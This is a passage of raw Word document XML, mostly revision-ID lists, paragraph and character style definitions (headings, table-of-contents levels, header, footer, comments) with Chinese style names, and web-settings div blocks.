    <w:rsid w:val="00D77E8B"/>
    <w:rsid w:val="00D810A1"/>
    <w:rsid w:val="00D81296"/>
    <w:rsid w:val="00D81FE9"/>
    <w:rsid w:val="00D82DD7"/>
    <w:rsid w:val="00D830C2"/>
    <w:rsid w:val="00D85AC5"/>
    <w:rsid w:val="00D91C98"/>
    <w:rsid w:val="00D93F93"/>
    <w:rsid w:val="00D963EF"/>
    <w:rsid w:val="00D978A5"/>
    <w:rsid w:val="00D97E80"/>
    <w:rsid w:val="00DA2CE1"/>
    <w:rsid w:val="00DA362F"/>
    <w:rsid w:val="00DB1E30"/>
    <w:rsid w:val="00DB54BD"/>
    <w:rsid w:val="00DB54C6"/>
    <w:rsid w:val="00DB77A6"/>
    <w:rsid w:val="00DB77F3"/>
    <w:rsid w:val="00DC0FE5"/>
    <w:rsid w:val="00DC701C"/>
    <w:rsid w:val="00DC780D"/>
    <w:rsid w:val="00DD0115"/>
    <w:rsid w:val="00DD0FC3"/>
    <w:rsid w:val="00DD47BC"/>
    <w:rsid w:val="00DD47E0"/>
    <w:rsid w:val="00DD6EA9"/>
    <w:rsid w:val="00DE002B"/>
    <w:rsid w:val="00DE10D4"/>
    <w:rsid w:val="00DE1D3A"/>
    <w:rsid w:val="00DE2038"/>
    <w:rsid w:val="00DE4109"/>
    <w:rsid w:val="00DE5EAA"/>
    <w:rsid w:val="00DF7863"/>
    <w:rsid w:val="00DF792C"/>
    <w:rsid w:val="00E00273"/>
    <w:rsid w:val="00E0082F"/>
    <w:rsid w:val="00E04380"/>
    <w:rsid w:val="00E06423"/>
    <w:rsid w:val="00E07C1A"/>
    <w:rsid w:val="00E1080D"/>
    <w:rsid w:val="00E11D6E"/>
    <w:rsid w:val="00E12A49"/>
    <w:rsid w:val="00E14769"/>
    <w:rsid w:val="00E17B2A"/>
    <w:rsid w:val="00E2029B"/>
    <w:rsid w:val="00E21BFB"/>
    <w:rsid w:val="00E21CFD"/>
    <w:rsid w:val="00E233DA"/>
    <w:rsid w:val="00E235AE"/>
    <w:rsid w:val="00E2411E"/>
    <w:rsid w:val="00E2456A"/>
    <w:rsid w:val="00E24760"/>
    <w:rsid w:val="00E25EA0"/>
    <w:rsid w:val="00E26034"/>
    <w:rsid w:val="00E27500"/>
    <w:rsid w:val="00E27671"/>
    <w:rsid w:val="00E32D0A"/>
    <w:rsid w:val="00E34C24"/>
    <w:rsid w:val="00E35DC2"/>
    <w:rsid w:val="00E40FE9"/>
    <w:rsid w:val="00E4429F"/>
    <w:rsid w:val="00E45A79"/>
    <w:rsid w:val="00E47185"/>
    <w:rsid w:val="00E503FF"/>
    <w:rsid w:val="00E5323D"/>
    <w:rsid w:val="00E5422C"/>
    <w:rsid w:val="00E568CB"/>
    <w:rsid w:val="00E5769A"/>
    <w:rsid w:val="00E605AC"/>
    <w:rsid w:val="00E60682"/>
    <w:rsid w:val="00E6162A"/>
    <w:rsid w:val="00E616C8"/>
    <w:rsid w:val="00E628E3"/>
    <w:rsid w:val="00E633B7"/>
    <w:rsid w:val="00E658E0"/>
    <w:rsid w:val="00E71153"/>
    <w:rsid w:val="00E71F79"/>
    <w:rsid w:val="00E72398"/>
    <w:rsid w:val="00E725FB"/>
    <w:rsid w:val="00E726A4"/>
    <w:rsid w:val="00E727BA"/>
    <w:rsid w:val="00E72FD6"/>
    <w:rsid w:val="00E7705D"/>
    <w:rsid w:val="00E80A6D"/>
    <w:rsid w:val="00E86993"/>
    <w:rsid w:val="00E92EF5"/>
    <w:rsid w:val="00E9513F"/>
    <w:rsid w:val="00E95B1D"/>
    <w:rsid w:val="00E9625A"/>
    <w:rsid w:val="00E96BFB"/>
    <w:rsid w:val="00EA0122"/>
    <w:rsid w:val="00EA0250"/>
    <w:rsid w:val="00EA0E5C"/>
    <w:rsid w:val="00EA1DEF"/>
    <w:rsid w:val="00EA22DC"/>
    <w:rsid w:val="00EA78DF"/>
    <w:rsid w:val="00EB24AB"/>
    <w:rsid w:val="00EB32FA"/>
    <w:rsid w:val="00EB4BCE"/>
    <w:rsid w:val="00EB6977"/>
    <w:rsid w:val="00EB780B"/>
    <w:rsid w:val="00EC0E17"/>
    <w:rsid w:val="00EC61F7"/>
    <w:rsid w:val="00EC66E9"/>
    <w:rsid w:val="00EC7126"/>
    <w:rsid w:val="00ED1085"/>
    <w:rsid w:val="00ED2144"/>
    <w:rsid w:val="00ED41C5"/>
    <w:rsid w:val="00ED460A"/>
    <w:rsid w:val="00ED6EF0"/>
    <w:rsid w:val="00EF477F"/>
    <w:rsid w:val="00EF730A"/>
    <w:rsid w:val="00F0102E"/>
    <w:rsid w:val="00F01093"/>
    <w:rsid w:val="00F029E7"/>
    <w:rsid w:val="00F0449F"/>
    <w:rsid w:val="00F04C75"/>
    <w:rsid w:val="00F04E19"/>
    <w:rsid w:val="00F06248"/>
    <w:rsid w:val="00F1144C"/>
    <w:rsid w:val="00F11866"/>
    <w:rsid w:val="00F12C93"/>
    <w:rsid w:val="00F12EF0"/>
    <w:rsid w:val="00F16F30"/>
    <w:rsid w:val="00F20C15"/>
    <w:rsid w:val="00F32D5A"/>
    <w:rsid w:val="00F33B20"/>
    <w:rsid w:val="00F37DB6"/>
    <w:rsid w:val="00F400C6"/>
    <w:rsid w:val="00F42B55"/>
    <w:rsid w:val="00F50697"/>
    <w:rsid w:val="00F5497B"/>
    <w:rsid w:val="00F6029C"/>
    <w:rsid w:val="00F62CB1"/>
    <w:rsid w:val="00F6548F"/>
    <w:rsid w:val="00F6606B"/>
    <w:rsid w:val="00F66A6C"/>
    <w:rsid w:val="00F70F95"/>
    <w:rsid w:val="00F71693"/>
    <w:rsid w:val="00F752EC"/>
    <w:rsid w:val="00F76D2B"/>
    <w:rsid w:val="00F872E8"/>
    <w:rsid w:val="00F87A0A"/>
    <w:rsid w:val="00F87C3D"/>
    <w:rsid w:val="00F87DA0"/>
    <w:rsid w:val="00F90E14"/>
    <w:rsid w:val="00F9121A"/>
    <w:rsid w:val="00F91CE9"/>
    <w:rsid w:val="00F93D29"/>
    <w:rsid w:val="00F94E1F"/>
    <w:rsid w:val="00F961BA"/>
    <w:rsid w:val="00F9694E"/>
    <w:rsid w:val="00F97730"/>
    <w:rsid w:val="00FA2DD4"/>
    <w:rsid w:val="00FA42F4"/>
    <w:rsid w:val="00FA47FD"/>
    <w:rsid w:val="00FA4AF6"/>
    <w:rsid w:val="00FA7036"/>
    <w:rsid w:val="00FA7F49"/>
    <w:rsid w:val="00FB033A"/>
    <w:rsid w:val="00FB2D0A"/>
    <w:rsid w:val="00FB328B"/>
    <w:rsid w:val="00FB6C39"/>
    <w:rsid w:val="00FB6D12"/>
    <w:rsid w:val="00FB708E"/>
    <w:rsid w:val="00FC0066"/>
    <w:rsid w:val="00FC057C"/>
    <w:rsid w:val="00FC279B"/>
    <w:rsid w:val="00FC430D"/>
    <w:rsid w:val="00FC4A85"/>
    <w:rsid w:val="00FC7599"/>
    <w:rsid w:val="00FC7E1D"/>
    <w:rsid w:val="00FD0679"/>
    <w:rsid w:val="00FD2BFA"/>
    <w:rsid w:val="00FD345E"/>
    <w:rsid w:val="00FD3CF1"/>
    <w:rsid w:val="00FE0AF9"/>
    <w:rsid w:val="00FE1F71"/>
    <w:rsid w:val="00FE2601"/>
    <w:rsid w:val="00FE38E0"/>
    <w:rsid w:val="00FE69EF"/>
    <w:rsid w:val="00FE7358"/>
    <w:rsid w:val="00FE79E8"/>
    <w:rsid w:val="00FE7F05"/>
    <w:rsid w:val="00FF1A26"/>
    <w:rsid w:val="00FF2B8B"/>
    <w:rsid w:val="00FF4040"/>
    <w:rsid w:val="00FF6DAC"/>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3BDD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5630566C-9AA7-0A46-AA16-2886913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78EE"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="480"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0081747E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0081747E"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003B7C41"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="a"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003B7C41"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D40C03"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>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747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1747E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="003B7C41"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003B7C41"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="标题 5 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D40C03"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a3">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006F02B6"/>
    <w:pPr>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:ind w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Songti SC" w:eastAsia="Songti SC" w:hAnsi="Songti SC" w:cstheme="minorBidi"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A97019"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:qFormat/>
    <w:rsid w:val="00CD3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65EF2"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="001B6DDE"/>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="001B6DDE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="profileheader-name">
    <w:name w:val="profileheader-name"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00804740"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00BA65B6"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00B33A8D"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B33A8D"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B33A8D"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0048579E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="黑体" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="31">
    <w:name w:val="Plain Table 3"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="43"/>
    <w:rsid w:val="0048579E"/>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a">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ab"/>
    <w:rsid w:val="007A0F74"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aa"/>
    <w:rsid w:val="007A0F74"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005855BD"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="009250D3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016635C"/>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f">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0016635C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="批注文字 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af3">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="批注主题 字符"/>
    <w:basedOn w:val="af2"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="af3"/>
    <w:next w:val="af3"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af6">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0016635C"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af8">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00DB1E30"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="新宋体"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C42C6"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C42C6"/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C42C6"/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C42C6"/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C42C6"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C42C6"/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af9">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006546AB"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Cite"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F077C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003F0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30">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="27922726">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="52850422">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="60374742">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1946494922">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
